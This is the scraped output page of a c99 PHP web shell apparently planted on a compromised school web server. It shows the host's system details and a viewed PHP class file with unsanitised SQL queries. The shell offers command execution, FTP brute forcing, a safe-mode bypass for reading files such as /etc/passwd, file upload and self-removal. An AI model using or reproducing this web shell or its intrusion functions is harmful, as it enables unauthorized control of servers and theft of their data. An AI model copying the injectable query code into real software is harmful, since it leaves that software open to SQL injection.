!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/teacher/class/   drwxr-xr-x
Free 52.4 GB of 127.8 GB (41%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     clsUmGroup.php (2.28 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
c=$c->c; $this->DB=$c->db; } function Save(){ if ($this->status==1){ $this->GpID=$this->GetNextCode(); $sql = "insert into umgroup values('$this->GpID', '$this->GpNameT', '$this->GpNameE', '$this->GpDesc', '$this->GpStID')"; }else { $sql = "update umgroup set GpNameT='$this->GpNameT', GpNameE='$this->GpNameE', GpDesc='$this->GpDesc', GpStID='$this->GpStID' where GpID='$this->GpID'"; } return $this->Dml($sql); } function Delete(){ return $this->Dml("delete from umgroup where GpID='$this->GpID'"); } function GetNextCode(){ $this->SetQuery("select max(GpID) as num from umgroup"); if ($result=$this->GetResult()) { return $result['num']+1; } } function RSumgroup(){ $this->SetQuery("select * from umgroup order by GpID"); } function GetRecord(){ if ($this->result = $this->GetResult()) { $this->GpID = $this->result['GpID']; $this->GpNameT = $this->result['GpNameT']; $this->GpNameE = $this->result['GpNameE']; $this->GpDesc = $this->result['GpDesc']; $this->GpStID = $this->result['GpStID']; return 1; }else { return 0; } } function SearchByKey($xKey){ if ($this->SetQuery("select * from umgroup where GpID= '$xKey'")){ return 1; }else { return 0; } } //****************** You can add new functions below **********************// function DeleteBySt($StID){ return $this->Dml("delete from umgroup where GpStID='$StID'"); } function RSumgroupOrderStID(){ $this->SetQuery("select * from umgroup order by GpStID,GpID"); } function RSumgroupByName(){ $this->SetQuery("select * from umgroup order by GpNameT"); } function RSumGroupByStID($stID){ $sql = "select * from umgroup where GpStID='$stID' order by GpNameT"; $this->SetQuery($sql); } function RSumgroupByStIDGroupMnIcon(){ $this->SetQuery("select g.GpID from umgroup g, ummenu m where g.GpStID=7 and g.GpID=m.MnIcon group by g.GpID union select g.GpID from umgroup g, ummenu m where g.GpStID=9 and g.GpID=m.MnIcon group by g.GpID"); } } //--End class umgroup-- ?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0051 ]--